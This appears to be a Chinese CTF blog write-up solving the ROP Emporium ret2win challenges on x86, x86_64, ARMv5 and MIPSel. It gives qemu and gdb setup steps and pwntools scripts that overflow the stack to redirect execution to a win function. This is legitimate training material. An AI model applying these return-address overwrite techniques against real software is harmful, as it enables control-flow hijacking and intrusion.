<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  <meta name="baidu-site-verification" content="codeva-0Qx7wvY9gP" />
  
  <title>『ROP Emporium』ret2win | C_LBY&#39;s BLOG</title>
  <meta name="author" content="鎏柏鱼">
  
  <meta name="description" content="https://ropemporium.com 各种架构的ROP练习">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="『ROP Emporium』ret2win"/>
  <meta property="og:site_name" content="C_LBY&#39;s BLOG"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="C_LBY&#39;s BLOG" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">C_LBY&#39;s BLOG</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/diary" title="fashion little junk">
			  <i class="fa fa-tasks"></i>Diary
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class="fa fa-rss"></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 『ROP Emporium』ret2win</h1>
		</div>
	



	<div class="row post">
		<!-- cols -->
		
			<div id="top_meta"></div>
			<div class="col-md-9">
				

							<!-- content -->
							<div class="mypage">
								
									<div class="alert alert-success description">
										<i class="fa fa-info-circle"></i> https://ropemporium.com 各种架构的ROP练习
									</div> <!-- alert -->
									

										<h3 id="0x01-ret2win32"><a href="#0x01-ret2win32" class="headerlink" title="0x01 ret2win32"></a>0x01 ret2win32</h3><p>x86架构的ret2text，非常简单，程序有栈溢出，没有canary保护，所以只要溢出覆盖ebp后，将ret地址覆盖为ret2win函数的地址即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = process(<span class="string">&#x27;./ret2win32&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ret2win = <span class="number">0x804862C</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x2c</span>+p32(ret2win)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x02-ret2win"><a href="#0x02-ret2win" class="headerlink" title="0x02 ret2win"></a>0x02 ret2win</h3><p>x86_64架构的ret2text，一样的非常简单，栈溢出完了之后覆盖ret地址为后门地址即可。但是这里需要注意一个问题，如果直接选取ret2win的函数地址，puts函数可以被正常执行，但是发现flag不会显示出来。不用调试也能知道这是64位下栈平衡的问题，并且前面的函数可以执行但唯独system执行不了的话，是卡在了do_system这个函数，这里不展开叙述。解决方案是，跳过ret2win函数中push rbp的语句即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = process(<span class="string">&#x27;./ret2win&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ret2win = <span class="number">0x400764</span> <span class="comment"># 57-64理论上都可以</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(ret2win)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x03-ret2win-armv5"><a href="#0x03-ret2win-armv5" class="headerlink" title="0x03 ret2win_armv5"></a>0x03 ret2win_armv5</h3><p>虽然不是第一次见到异构pwn题，但是是第一次做，所以这里记录一下基本的环境配置步骤和arm汇编相关的知识，但不会深入展开，主打一个够用就行。</p>
<h5 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo apt-get update</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo apt install gdb-multiarch</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo apt install qemu-user qemu-user-static gcc-aarch64-linux-gnu binutils-aarch64-linux-gnu binutils-aarch64-linux-gnu-dbg build-essential gcc-arm-linux-gnueabi libc6-armel-cross</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo <span class="built_in">mkdir</span> /etc/qemu-binfmt</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo <span class="built_in">ln</span> -s /usr/arm-linux-gnueabi /etc/qemu-binfmt/arm</span></span><br></pre></td></tr></table></figure>

<h5 id="运行程序"><a href="#运行程序" class="headerlink" title="运行程序"></a>运行程序</h5><p>如果想要在终端运行arm架构的程序，那就用以下命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">qemu-arm-static ./your_exec_file</span></span><br></pre></td></tr></table></figure>

<p>如果找不到动态链接库，就加个<code>-L /usr/mipsel-linux-gnu/</code>在中间就行，调试同理。</p>
<h5 id="调试程序"><a href="#调试程序" class="headerlink" title="调试程序"></a>调试程序</h5><p>如果想要调试arm架构的程序，使用以下命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">qemu-arm-static -g 9999 ./your_exec_file</span></span><br></pre></td></tr></table></figure>

<p>然后打开另一个终端，输入</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">gdb-multiarch -q ./your_exec_file</span></span><br><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash"><span class="built_in">set</span> solib-search-path /usr/arm-linux-gnueabi/lib/</span></span><br><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">target remote :9999</span></span><br></pre></td></tr></table></figure>

<p>上面的9999是端口，数字可以自己定。第三行命令是为了让gdb找到动态链接库。如果是aarch64架构的，也是一样的操作，换一下动态链接库路径为&#x2F;usr&#x2F;aarch64-linux-gnu&#x2F;lib&#x2F;即可。</p>
<h5 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h5><p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E6%B1%87%E7%BC%96%E4%BB%A3%E7%A0%81.png" alt="ret2win_armv5汇编代码"></p>
<p>首先先看看arm寄存器方面和x86的不同之处。</p>
<ul>
<li>32位的arm有13个通用寄存器，分别是R0-R12。</li>
<li>R0在常规操作中可用于存储临时值，也可以用于存储函数的第一个参数或返回结果。</li>
<li>在ARM架构中约定指定函数前四个参数存储在R0~R3寄存器中。</li>
<li>R7寄存器在函数调用中负责存储系统调用号。</li>
<li>R11寄存器，又称FP，可以用来记录回溯信息,也可以当做局部变量来使用。</li>
<li>R13是栈指针寄存器，又称SP，相当于esp。</li>
<li>R14为链接寄存器，又称LR，用于保存调用函数的下一条指令地址，用于被调用函数(子函数)结束工作后返回调用函数(父函数)。有点像ret地址。</li>
<li>R15为程序计数器，又称PC，类似于X86架构下的EIP寄存器负责保存目标地址，与x86不同的点在于PC在ARM状态下存储当前指令+4的地址。这个寄存器可读可写，对PC进行写操作可以改变程序执行流，而且是立马就变。</li>
<li>还有一些特殊的标志寄存器，这里不做介绍。</li>
</ul>
<p>现在我们来看代码。首先把LR和R11压入栈，然后将SP+4存到R11，SP-0x20开辟栈空间。这和x86调用函数如出一辙。注意此时R11就指向返回地址了。</p>
<p>调用read的时候把第一个参数放到了R0，第二个参数是R11-0x24，放到了R1，第三个参数在R2。从这里可以确认的一点是我们输入的地方距离存放LR的地方隔了0x24。所以填充0x24padding再写个ret2win的地址，我们就算是利用栈溢出劫持了程序执行流。</p>
<p>函数结束之后先将R11-4赋给了SP，再分别将R11和PC出栈。那么这时，PC寄存器里地址就是我们写入的ret2win的函数地址。</p>
<h5 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h5><p>因为是第一次做arm的pwn题，我们还是详细调试一下看看，加深理解。首先我们开启gdb-multiarch之后，连接qemu端口，设置好动态链接库。之后断点在pwnme函数，再往后就单步执行看栈和寄存器变化就可以了。</p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%950.png" alt="ret2win_armv5调试0"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%951.png" alt="ret2win_armv5调试1"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%952.png" alt="ret2win_armv5调试2"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%953.png" alt="ret2win_armv5调试3"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%954.png" alt="ret2win_armv5调试4"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_armv5%E8%B0%83%E8%AF%955.png" alt="ret2win_armv5调试5"></p>
<h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch = <span class="string">&#x27;arm&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">r = process([<span class="string">&#x27;qemu-arm-static&#x27;</span>, <span class="string">&#x27;-L&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;/usr/arm-linux-gnueabi/&#x27;</span>, <span class="string">&#x27;./ret2win_armv5&#x27;</span>])</span><br><span class="line"></span><br><span class="line">ret2win = <span class="number">0x105EC</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x24</span>+p32(ret2win)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x04-ret2win-mipsel"><a href="#0x04-ret2win-mipsel" class="headerlink" title="0x04 ret2win_mipsel"></a>0x04 ret2win_mipsel</h3><p>也是第一次接触的mips的pwn，和arm一样，先讲环境配置。</p>
<h5 id="环境配置-1"><a href="#环境配置-1" class="headerlink" title="环境配置"></a>环境配置</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo apt install qemu-user</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo apt install libc6-mipsel-cross</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo <span class="built_in">mkdir</span> /etc/qemu-binfmt</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">sudo <span class="built_in">ln</span> -s /usr/mipsel-linux-gnu /etc/qemu-binfmt/mipsel</span></span><br></pre></td></tr></table></figure>

<h5 id="运行程序-1"><a href="#运行程序-1" class="headerlink" title="运行程序"></a>运行程序</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">qemu-mipsel-static ./your_exec_file</span></span><br></pre></td></tr></table></figure>

<p>如果找不到动态链接库，就加个<code>-L /usr/mipsel-linux-gnu/</code>在中间就行，调试同理。</p>
<h5 id="调试程序-1"><a href="#调试程序-1" class="headerlink" title="调试程序"></a>调试程序</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">qemu-mipsel-static -g 9999 ./your_exec_file</span></span><br></pre></td></tr></table></figure>

<p>然后打开另一个终端，输入</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">gdb-multiarch -q ./your_exec_file</span></span><br><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash"><span class="built_in">set</span> solib-search-path /usr/mipsel-linux-gnu/lib/</span></span><br><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">target remote :9999</span></span><br></pre></td></tr></table></figure>

<p>和arm调试是一样的。</p>
<h5 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h5><p><img src="https://c-lby.top/images/ROPEmporium/ret2win_mipselRA%E5%85%A5%E6%A0%88.png" alt="ret2win_mipselRA入栈"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_mipsel%E6%B1%87%E7%BC%96%E4%BB%A3%E7%A0%81.png" alt="ret2win_mipsel汇编代码"></p>
<p><img src="https://c-lby.top/images/ROPEmporium/ret2win_mipselRA%E5%87%BA%E6%A0%88.png" alt="ret2win_mipselRA出栈"></p>
<p>mips的指令和x86、arm的指令长得差很远。先来看一些基础的知识。</p>
<ol>
<li>MIPS32 架构中是没有 EBP 寄存器的，程序函数调用的时候是将当前栈指针向下移动 n 比特到该函数的 stack frame 存储组空间，函数返回的时候再加上偏移量恢复栈</li>
<li>传参过程中，前四个参数a0−a3，多余的会保存在调用函数的预留的栈顶空间内</li>
<li>MIPS 调用函数时会把函数的返回地址直接存入 $RA 寄存器</li>
</ol>
<p>可以注意到函数初始时RA寄存器的内容被入栈到了距离SP寄存器0x38+4的位置，函数退出时RA出栈。所以我们只要栈溢出到SP+0x60处写入ret2win函数地址即可成功劫持程序执行流。</p>
<h5 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = process([<span class="string">&#x27;qemu-mipsel-static&#x27;</span>, <span class="string">&#x27;./ret2win_mipsel&#x27;</span>])</span><br><span class="line"></span><br><span class="line">ret2win = <span class="number">0x400A00</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">36</span>+p32(ret2win)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


											<div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0
        国际许可协议(CC BY-NC-SA 4.0) 发布.</a></br>
    因本人技术水平和知识面有限, 内容如有纰漏或者需要修正的地方, 欢迎大家指正。转载请注明来自<a href="https://c-lby.github.io" target="_blank">C_LBY's blog</a>！
</div>
							</div>

							
									
										<span data-path="/2024/04/07/rop-emporium-ret2win/">
											<em class="post-meta-item-text"> Page View <i
													class="waline-pageview-count"></i></em>
										</span>

										
											<div>
												<center>

													<div class="pagination">

    
    
    <a href="/2024/04/28/2024xyctf-pwn-wp/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> 上一页</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/03/28/2016HCTF-fheap/" type="button" class="btn btn-default ">下一页<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


												</center>
											</div>

											<!-- comment -->
											<!--
<section id="comment">
    <h2 class="title">留言</h2>

    
</section>

-->
											
													
														<section id="comments" class="comments">
															<!-- <link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
  var walineConfig = 
    walineConfig.el='#waline';
  Waline.init(walineConfig);
</script> -->

<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

  init({
    enable: true,
    el: '#waline',
    serverURL: 'https://blog-s-comment-three.vercel.app',
    dark: true,
    pageview: true,
    lang: 'zh-CN',
    requiredMeta: ['nick', 'mail'],
    locale:
      { placeholder: 'Say something……' },
    highlighter: true,
    search: false,
    emoji: [
      '//unpkg.com/@waline/emojis@1.2.0/weibo',
      '//unpkg.com/@waline/emojis@1.2.0/bmoji',
      '//unpkg.com/@waline/emojis@1.2.0/bilibili',
      'https://unpkg.com/@waline/emojis@1.2.0/qq',
    ],
    imageUploader: false,
  });
</script>
														</section>
														
															
					</div> <!-- col-md-9/col-md-12 -->


					
						<div id="side_meta">
							<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-04-07 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/WP/">WP<span>12</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/CTF/">CTF<span>21</span></a></li> <li><a href="/tags/PWN/">PWN<span>25</span></a></li> <li><a href="/tags/WP/">WP<span>14</span></a></li> <li><a href="/tags/ROP/">ROP<span>2</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x01-ret2win32"><span class="toc-article-text">0x01 ret2win32</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x02-ret2win"><span class="toc-article-text">0x02 ret2win</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x03-ret2win-armv5"><span class="toc-article-text">0x03 ret2win_armv5</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-article-text">环境配置</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%BF%90%E8%A1%8C%E7%A8%8B%E5%BA%8F"><span class="toc-article-text">运行程序</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F"><span class="toc-article-text">调试程序</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-article-text">题目分析</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%B0%83%E8%AF%95"><span class="toc-article-text">调试</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x04-ret2win-mipsel"><span class="toc-article-text">0x04 ret2win_mipsel</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE-1"><span class="toc-article-text">环境配置</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%BF%90%E8%A1%8C%E7%A8%8B%E5%BA%8F-1"><span class="toc-article-text">运行程序</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F-1"><span class="toc-article-text">调试程序</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90-1"><span class="toc-article-text">题目分析</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP-1"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->



						</div>

						

			</div><!-- row -->

			<!--
 -->
	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
    &copy; 2024
      鎏柏鱼's Blog
        
                powered by <a href="http://hexo.io/" target="_blank">Hexo</a> | Theme by <a
                  href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>
</p> </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
